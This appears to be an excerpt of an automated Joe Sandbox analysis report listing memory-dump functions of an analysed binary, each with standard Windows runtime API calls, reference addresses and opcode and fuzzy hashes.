                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                        • Opcode ID: 17d8e83a7b62b5882bbb97268331510f32b0cef839c15c45e9b95908141c2b4d
                                                                                                                                                                                                                                        • Instruction ID: a9a4b3b80b2c26f365d88c550ce2966085bbb3d8415395b1a4734f1d4c42143a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17d8e83a7b62b5882bbb97268331510f32b0cef839c15c45e9b95908141c2b4d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A519C72A0020BBBEF249FE0CC85FAA7BBAEF44780F154529F91496190D771DC908B90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: 63be801db4e300405dffe06e9abcfc8b61a7be191d37a312ee2f1498d83404e8
                                                                                                                                                                                                                                        • Instruction ID: 14ffcf0b20d9336b4c9ac04af7e23991b7add2e3fd0cea910085230148700d48
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63be801db4e300405dffe06e9abcfc8b61a7be191d37a312ee2f1498d83404e8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74B1467AA003669FDB258F6CCC82BAE7BA5EF67710F144165E944AF282D3749D01C7A0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00192777
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0019277F
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00192808
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00192833
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00192888
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                        • Opcode ID: da171d003b71bed1586adfa47573156631d756a0e2b52e43c79a30adadcb61c5
                                                                                                                                                                                                                                        • Instruction ID: 81956b3491fe8721eea416a3ab9f5caa2b667c097de3d8d060eaee90f4468107
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da171d003b71bed1586adfa47573156631d756a0e2b52e43c79a30adadcb61c5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E41B134A00218BBCF14EF68C884AAEBBF5BF15324F148555E814AB392D735EA45CB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,001A0A21,00000000,?,00000000,00000000,B1A7CAD6,?,001A069F,00000022,FlsSetValue,001B2EF8,001B2F00,00000000), ref: 001A09D3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                        • Opcode ID: cee673dd7d819ba4fd27dfca3019d06dd7f077d300d1bd45a17cf5254d96701b
                                                                                                                                                                                                                                        • Instruction ID: 0e0949c45d4983a5c5e892a1b038b4598f130af210c4515683a457a6bc65250e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cee673dd7d819ba4fd27dfca3019d06dd7f077d300d1bd45a17cf5254d96701b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9213D39A01215EBE7239B65DC41B6B77689B4B3B8F150210F91EA7292D730ED40C6E0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0019D413,0019250D,001910C4), ref: 0019D42A
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019D438
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019D451
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,0019D413,0019250D,001910C4), ref: 0019D4A3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                        • Opcode ID: 0134fa7e3faee0c668e5a698d90574bd2f56ab881f1109fb8ca56a2ce4d19639
                                                                                                                                                                                                                                        • Instruction ID: 308227fcd83102c5e733edaf47de4720c8a02f3cf3558cdb8454b3722cb71846
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0134fa7e3faee0c668e5a698d90574bd2f56ab881f1109fb8ca56a2ce4d19639
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4701F73A10A3125EBE252779BC8696B2B85EF117793200329F52446CF2EF315C44D181
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00179804
                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00179871
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00179A07
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Facet_Lockit::_Lockit::~_Register
                                                                                                                                                                                                                                        • String ID: 57Xh$57Xh
                                                                                                                                                                                                                                        • API String ID: 878851027-446803396
                                                                                                                                                                                                                                        • Opcode ID: f0cfecdd5a9f71016f4b696349009b0de0e62112473f31c14456406860e6bb50
                                                                                                                                                                                                                                        • Instruction ID: 1b6f24c979535cf11c807bac7e0aafab72258c71abf90aa921ee58398e8b822f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0cfecdd5a9f71016f4b696349009b0de0e62112473f31c14456406860e6bb50
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA5169706083058FCB24AF288494A2EB7F1AB99354F54892EF58DD7321D734DE889B93
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3E6C43DE,?,?,00000000,001AFE05,000000FF,?,00197E4D,00197D34,?,00197EE9,00000000), ref: 00197DC1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00197DD3
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,001AFE05,000000FF,?,00197E4D,00197D34,?,00197EE9,00000000), ref: 00197DF5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 8a39f529475714876122c9ae5e58bec9b3b8f8d0a481597846b9c418c7255af6
                                                                                                                                                                                                                                        • Instruction ID: 6c4874bc8e0ee6d81b17f335efacac8bf9172319f456bd8fbee1538bf4edb5dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a39f529475714876122c9ae5e58bec9b3b8f8d0a481597846b9c418c7255af6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A016231954615ABDB119F90DC05FBEBBF8FF44B10F040629F815A26D0DB759940CA90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 001A117F
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 001A1248
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001A12AF
                                                                                                                                                                                                                                          • Part of subcall function 0019F9B9: RtlAllocateHeap.NTDLL(00000000,001A1945,000328EC,?,001A1945,00000220,?,0019A5E8,000328EC), ref: 0019F9EB
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001A12C2
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 001A12CF
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1423051803-0
                                                                                                                                                                                                                                        • Opcode ID: 0819e8928a7fc16c8afa6b3da90de39c19a1b11ead2644990675824092c42129
                                                                                                                                                                                                                                        • Instruction ID: d1d60468abc0c0f5f7d2a36cf04d129b2e0f8e3b552c80eb225db08eb2e42715
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0819e8928a7fc16c8afa6b3da90de39c19a1b11ead2644990675824092c42129
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9851A37A600206BFEF255FA5CC81FBB3AE9DF96750F25052AFE04D6150EB30DC5096A0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 738035616-0
                                                                                                                                                                                                                                        • Opcode ID: 31503d948b8804452fdfcb9aaf17b5d00951239731076b59c40f32b8ee569f2c
                                                                                                                                                                                                                                        • Instruction ID: bf6ca5651480e5d5b6669b09e872cdb23239d0e0b439c3f5ca25232e2334e790
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31503d948b8804452fdfcb9aaf17b5d00951239731076b59c40f32b8ee569f2c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D01C035900119DFCF0AEBE0D845AAD7BB1BFE8320F244509E8146B281CF74AA418F81
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0019E01E,?,?,00000000,00000000,00000000,?), ref: 0019E13D
                                                                                                                                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0019E223
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CatchEncodePointer
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                        • Opcode ID: b5e9fc0d2c5cc830b40d1aec7ab8660ac64e36849af2468ad4248c4ea4c11c54
                                                                                                                                                                                                                                        • Instruction ID: 6eec2a8531efe8c847953374a4f80b583e111b6c2b46aabb21685276aeb95b3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5e9fc0d2c5cc830b40d1aec7ab8660ac64e36849af2468ad4248c4ea4c11c54
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5416D71900109AFCF16DF98DC81AEE7BF5FF48300F188169F9046B261D335AA51DB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00176E8C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                        • String ID: !gKo$!gKo$!gKo
                                                                                                                                                                                                                                        • API String ID: 4194217158-1776696246
                                                                                                                                                                                                                                        • Opcode ID: 3f46247c491d41a67e384ec0cce7b0141b760ead5b651a80a3b244a64db28484
                                                                                                                                                                                                                                        • Instruction ID: ebac402cd852cf2e8b39a28c10a4c7f1ea7094c3c0972b95e29b7586ca41bdf0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f46247c491d41a67e384ec0cce7b0141b760ead5b651a80a3b244a64db28484
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9001D6F49086104BCE549B1C985591E77E4DB26344F55C879F68DDB700DB31DC848BA3
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001AA46D,00000000,?,001C0CF0,?,?,?,001AA3A4,00000004,InitializeCriticalSectionEx,001B34F4,001B34FC), ref: 001AA3DE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,001AA46D,00000000,?,001C0CF0,?,?,?,001AA3A4,00000004,InitializeCriticalSectionEx,001B34F4,001B34FC,00000000,?,0019E33C), ref: 001AA3E8
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001AA410
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                        • Opcode ID: ff83ab0d151267f6d479592b079bf9c5105807590f71c6a8b32cb1dc47cfb00d
                                                                                                                                                                                                                                        • Instruction ID: cdabccc5975960b1ca08734a0747150f73cedda3dc6bba4d1fdfc2b389a18dcc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff83ab0d151267f6d479592b079bf9c5105807590f71c6a8b32cb1dc47cfb00d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAE01A30784304BAEB202F62EC0AB687A54AF11B85F548030F94CA84A1D7A2A9518AA5
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(3E6C43DE,00000000,00000000,?), ref: 001A7663
                                                                                                                                                                                                                                          • Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A78B5
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A78FB
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 001A799E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                        • Opcode ID: 6d083322a2cefb54ea5133bcacaf69e7a5bde7a109aa66ca375782664843ca50
                                                                                                                                                                                                                                        • Instruction ID: b5cf226d70f1d1e36621a0ea6fc53fad0c3444e97dc23c694e7489ac1caa4e78
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d083322a2cefb54ea5133bcacaf69e7a5bde7a109aa66ca375782664843ca50
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED19D79D042489FCF15CFE8C890AAEBBB5FF4A314F24452AE455EB391D730AA42CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
